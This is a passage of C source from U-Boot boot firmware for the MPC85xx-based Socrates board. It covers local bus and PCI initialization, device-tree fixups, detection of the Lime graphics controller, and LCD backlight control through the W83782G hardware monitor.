			       &flash_info[CONFIG_SYS_MAX_FLASH_BANKS - 1]);
	}

	return 0;
}
/*
 * Initialize Local Bus.
 *
 * Programs LCRR (DLL bypass is disabled for local-bus clocks >= 66 MHz,
 * enabled below that), clears and enables LBC/ECM error reporting, and
 * loads the UPMA (FPGA access) and UPMB (Lime controller access) timing
 * tables from upm_table.h.
 */
void local_bus_init (void)
{
	volatile fsl_lbc_t *lbc = LBC_BASE_ADDR;
	volatile ccsr_local_ecm_t *ecm = (void *)(CONFIG_SYS_MPC85xx_ECM_ADDR);
	sys_info_t sysinfo;
	uint clkdiv;
	uint lbc_mhz;
	uint lcrr = CONFIG_SYS_LBC_LCRR;

	get_sys_info (&sysinfo);
	clkdiv = lbc->lcrr & LCRR_CLKDIV;
	lbc_mhz = sysinfo.freq_systembus / 1000000 / clkdiv;

	/* Disable PLL bypass for Local Bus Clock >= 66 MHz */
	if (lbc_mhz >= 66)
		lcrr &= ~LCRR_DBYP;	/* DLL Enabled */
	else
		lcrr |= LCRR_DBYP;	/* DLL Bypass */

	out_be32 (&lbc->lcrr, lcrr);
	asm ("sync;isync;msync");	/* order the LCRR update before further LB access */

	out_be32 (&lbc->ltesr, 0xffffffff);	/* Clear LBC error interrupts */
	out_be32 (&lbc->lteir, 0xffffffff);	/* Enable LBC error interrupts */
	out_be32 (&ecm->eedr, 0xffffffff);	/* Clear ecm errors */
	out_be32 (&ecm->eeer, 0xffffffff);	/* Enable ecm errors */

	/* Init UPMA for FPGA access */
	out_be32 (&lbc->mamr, 0x44440);	/* Use a customer-supplied value */
	upmconfig (UPMA, (uint *)UPMTableA, sizeof(UPMTableA)/sizeof(int));

	/* Init UPMB for Lime controller access */
	out_be32 (&lbc->mbmr, 0x444440);	/* Use a customer-supplied value */
	upmconfig (UPMB, (uint *)UPMTableB, sizeof(UPMTableB)/sizeof(int));
}
#if defined(CONFIG_PCI)
/*
 * Initialize PCI Devices, report devices found.
 */

/*
 * Static configuration used only when PCI plug-and-play auto-config is
 * disabled: fixed resources for the on-board Ethernet device.
 */
#ifndef CONFIG_PCI_PNP
static struct pci_config_table pci_mpc85xxads_config_table[] = {
	{PCI_ANY_ID, PCI_ANY_ID, PCI_ANY_ID, PCI_ANY_ID,
	 PCI_IDSEL_NUMBER, PCI_ANY_ID,
	 pci_cfgfunc_config_device, {PCI_ENET0_IOADDR,
				     PCI_ENET0_MEMADDR,
				     PCI_COMMAND_MEMORY |
				     PCI_COMMAND_MASTER}},
	{}
};
#endif

/* Controller descriptor for the single PCI1 hose. */
static struct pci_controller hose = {
#ifndef CONFIG_PCI_PNP
	config_table:pci_mpc85xxads_config_table,
#endif
};
#endif /* CONFIG_PCI */

/* Register and scan the PCI bus; a no-op when PCI support is disabled. */
void pci_init_board (void)
{
#ifdef CONFIG_PCI
	pci_mpc85xx_init (&hose);
#endif /* CONFIG_PCI */
}
#ifdef CONFIG_BOARD_EARLY_INIT_R
/*
 * board_early_init_r() - pulse a GPIO to reset the W83782G hardware
 * monitor chip.
 *
 * Enables the GPOut function, drives the GPIO outputs to 0x3F, waits
 * 200 us, then drives 0x1F (clears bit 5; the original comment says
 * "GPIO pin 2" — verify the bit/pin mapping against the schematic).
 * Always returns 0.
 */
int board_early_init_r (void)
{
	volatile ccsr_gur_t *gur = (void *)(CONFIG_SYS_MPC85xx_GUTS_ADDR);

	/* set and reset the GPIO pin 2 which will reset the W83782G chip */
	out_8((unsigned char*)&gur->gpoutdr, 0x3F );
	out_be32((unsigned int*)&gur->gpiocr, 0x200 );	/* enable GPOut */
	udelay(200);
	out_8( (unsigned char*)&gur->gpoutdr, 0x1F );

	return (0);
}
#endif /* CONFIG_BOARD_EARLY_INIT_R */
#ifdef CONFIG_OF_BOARD_SETUP
/*
 * ft_board_setup() - fix up the device tree before the OS boots.
 *
 * Rewrites the /localbus "ranges" property with the windows actually
 * configured at run time: NOR FLASH on CS0 (detected base/size), the
 * Lime graphics controller on CS2 (only when it was found), and the
 * FPGA on CS3.  Each entry is <cs 0 base size>.  Always returns 0.
 */
int ft_board_setup(void *blob, bd_t *bd)
{
	u32 val[12];	/* up to 3 ranges entries x 4 cells */
	int rc, i = 0;

	ft_cpu_setup(blob, bd);

	/* Fixup NOR FLASH mapping */
	val[i++] = 0;				/* chip select number */
	val[i++] = 0;				/* always 0 */
	val[i++] = gd->bd->bi_flashstart;
	val[i++] = gd->bd->bi_flashsize;

	if (mb862xx.frameAdrs == CONFIG_SYS_LIME_BASE) {
		/* Fixup LIME mapping */
		val[i++] = 2;			/* chip select number */
		val[i++] = 0;			/* always 0 */
		val[i++] = CONFIG_SYS_LIME_BASE;
		val[i++] = CONFIG_SYS_LIME_SIZE;
	}

	/* Fixup FPGA mapping */
	val[i++] = 3;				/* chip select number */
	val[i++] = 0;				/* always 0 */
	val[i++] = CONFIG_SYS_FPGA_BASE;
	val[i++] = CONFIG_SYS_FPGA_SIZE;

	rc = fdt_find_and_setprop(blob, "/localbus", "ranges",
				  val, i * sizeof(u32), 1);
	if (rc)
		printf("Unable to update localbus ranges, err=%s\n",
		       fdt_strerror(rc));

	return 0;
}
#endif /* CONFIG_OF_BOARD_SETUP */
#define DEFAULT_BRIGHTNESS	25		/* percent; used when "brightness" env is unset/negative */
#define BACKLIGHT_ENABLE	(1 << 31)	/* FPGA reg 0x0c: backlight LED enable bit */

/*
 * Lime GDC init sequence: {register offset, value} pairs terminated by
 * a {0, 0} entry, consumed by the generic mb862xx driver.  Values are
 * panel-specific timings (presumably for the 800x480 panel configured
 * in board_video_init() — verify against the MB862xx manual).
 */
static const gdc_regs init_regs [] =
{
	{0x0100, 0x00010f00},
	{0x0020, 0x801901df},
	{0x0024, 0x00000000},
	{0x0028, 0x00000000},
	{0x002c, 0x00000000},
	{0x0110, 0x00000000},
	{0x0114, 0x00000000},
	{0x0118, 0x01df0320},
	{0x0004, 0x041f0000},
	{0x0008, 0x031f031f},
	{0x000c, 0x017f0349},
	{0x0010, 0x020c0000},
	{0x0014, 0x01df01e9},
	{0x0018, 0x00000000},
	{0x001c, 0x01e00320},
	{0x0100, 0x80010f00},
	{0x0, 0x0}
};

/* Hand the Lime init table above to the mb862xx video driver. */
const gdc_regs *board_get_regs (void)
{
	return init_regs;
}
/*
 * lime_probe() - detect the MB862xx "Lime" graphics controller on CS2.
 *
 * Temporarily programs chip-select 2 with GPCM settings suitable for
 * the probe, asks the mb862xx driver for the controller type, then
 * restores the previous CS2 BR/OR values.
 *
 * Returns 1 if a Lime controller was found, 0 otherwise.
 */
int lime_probe(void)
{
	uint cfg_br2;
	uint cfg_or2;
	int type;

	cfg_br2 = get_lbc_br(2);
	cfg_or2 = get_lbc_or(2);

	/* Configure GPCM for CS2 */
	set_lbc_br(2, 0);	/* disable CS2 while reprogramming */
	set_lbc_or(2, 0xfc000410);
	set_lbc_br(2, (CONFIG_SYS_LIME_BASE) | 0x00001901);

	/* Get controller type */
	type = mb862xx_probe(CONFIG_SYS_LIME_BASE);

	/* Restore previous CS2 configuration */
	set_lbc_br(2, 0);
	set_lbc_or(2, cfg_or2);
	set_lbc_br(2, cfg_br2);

	return (type == MB862XX_TYPE_LIME) ? 1 : 0;
}
/*
 * board_video_init() - detect the Lime GDC and describe the panel.
 *
 * Returns the Lime frame-buffer base address, or 0 if no controller is
 * present.  Panel parameters: 800x480, 15 bpp 555 RGB, 2 bytes/pixel.
 */
unsigned int board_video_init (void)
{
	if (!lime_probe())
		return 0;

	mb862xx.winSizeX = 800;
	mb862xx.winSizeY = 480;
	mb862xx.gdfIndex = GDF_15BIT_555RGB;
	mb862xx.gdfBytesPP = 2;

	return CONFIG_SYS_LIME_BASE;
}
/* W83782G hardware-monitor register addresses (bank 0). */
#define W83782D_REG_CFG		0x40
#define W83782D_REG_BANK_SEL	0x4e
#define W83782D_REG_ADCCLK	0x4b
#define W83782D_REG_BEEP_CTRL	0x4d
#define W83782D_REG_BEEP_CTRL2	0x57
#define W83782D_REG_PWMOUT1	0x5b
#define W83782D_REG_VBAT	0x5d

/*
 * w83782d_hwmon_init() - bring up the W83782G hardware monitor.
 *
 * Probes the chip by reading its configuration register, resets it,
 * selects bank 0, then programs the ADC clock, beep control, initial
 * PWMOUT1 duty cycle and VBAT monitoring before starting monitoring.
 * Register values are board-specific magic — check them against the
 * Winbond W83782D datasheet before changing.
 *
 * Returns 0 on success, -1 if the chip does not respond on I2C.
 */
static int w83782d_hwmon_init(void)
{
	u8 buf;

	/* presence check: a failed read means no chip at this address */
	if (i2c_read(CONFIG_SYS_I2C_W83782G_ADDR, W83782D_REG_CFG, 1, &buf, 1))
		return -1;

	i2c_reg_write(CONFIG_SYS_I2C_W83782G_ADDR, W83782D_REG_CFG, 0x80);
	i2c_reg_write(CONFIG_SYS_I2C_W83782G_ADDR, W83782D_REG_BANK_SEL, 0);
	i2c_reg_write(CONFIG_SYS_I2C_W83782G_ADDR, W83782D_REG_ADCCLK, 0x40);

	buf = i2c_reg_read(CONFIG_SYS_I2C_W83782G_ADDR, W83782D_REG_BEEP_CTRL);
	i2c_reg_write(CONFIG_SYS_I2C_W83782G_ADDR, W83782D_REG_BEEP_CTRL,
		      buf | 0x80);
	i2c_reg_write(CONFIG_SYS_I2C_W83782G_ADDR, W83782D_REG_BEEP_CTRL2, 0);
	i2c_reg_write(CONFIG_SYS_I2C_W83782G_ADDR, W83782D_REG_PWMOUT1, 0x47);
	i2c_reg_write(CONFIG_SYS_I2C_W83782G_ADDR, W83782D_REG_VBAT, 0x01);

	buf = i2c_reg_read(CONFIG_SYS_I2C_W83782G_ADDR, W83782D_REG_CFG);
	i2c_reg_write(CONFIG_SYS_I2C_W83782G_ADDR, W83782D_REG_CFG,
		      (buf & 0xf4) | 0x01);

	return 0;
}
static void board_backlight_brightness(int br)
{
u32 reg;
u8 buf;
u8 old_buf;
/* Select bank 0 */
if (i2c_read(CONFIG_SYS_I2C_W83782G_ADDR, 0x4e, 1, &old_buf, 1))
goto err;
else
buf = old_buf & 0xf8;
if (i2c_write(CONFIG_SYS_I2C_W83782G_ADDR, 0x4e, 1, &buf, 1))
goto err;
if (br > 0) {
/* PWMOUT1 duty cycle ctrl */
buf = 255 / (100 / br);
if (i2c_write(CONFIG_SYS_I2C_W83782G_ADDR, 0x5b, 1, &buf, 1))
goto err;
/* LEDs on */
reg = in_be32((void *)(CONFIG_SYS_FPGA_BASE + 0x0c));
if (!(reg & BACKLIGHT_ENABLE))
out_be32((void *)(CONFIG_SYS_FPGA_BASE + 0x0c),
reg | BACKLIGHT_ENABLE);
} else {
buf = 0;
if (i2c_write(CONFIG_SYS_I2C_W83782G_ADDR, 0x5b, 1, &buf, 1))
goto err;
/* LEDs off */
reg = in_be32((void *)(CONFIG_SYS_FPGA_BASE + 0x0c));
reg &= ~BACKLIGHT_ENABLE;
out_be32((void *)(CONFIG_SYS_FPGA_BASE + 0x0c), reg);
}
/* Restore previous bank setting */
if (i2c_write(CONFIG_SYS_I2C_W83782G_ADDR, 0x4e, 1, &old_buf, 1))
goto err;
return;
err:
printf("W83782G I2C access failed\n");
}
/*
 * board_backlight_switch() - switch the display backlight on or off.
 *
 * @flag: non-zero turns the backlight on at the percentage given by the
 *        "brightness" environment variable (DEFAULT_BRIGHTNESS when the
 *        variable is unset or negative); zero turns it off.
 *
 * The W83782G monitor is (re-)initialized first because its PWM output
 * drives the backlight; a failure is reported but not fatal.
 */
void board_backlight_switch (int flag)
{
	char * param;
	int rc;

	if (w83782d_hwmon_init())
		printf ("hwmon IC init failed\n");

	if (flag) {
		param = env_get("brightness");
		rc = param ? simple_strtol(param, NULL, 10) : -1;
		if (rc < 0)
			rc = DEFAULT_BRIGHTNESS;
	} else {
		rc = 0;
	}
	board_backlight_brightness(rc);
}
#if defined(CONFIG_CONSOLE_EXTRA_INFO)
/*
* Return text to be printed besides the logo.
*/
/*
 * Provide the text shown beside the boot logo: the board name on the
 * first line and an empty string on every other line.
 */
void video_get_info_str (int line_number, char *info)
{
	if (line_number != 1) {
		info[0] = '\0';
		return;
	}
	strcpy(info, " Board: Socrates");
}
#endif
| {
"pile_set_name": "Github"
} |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.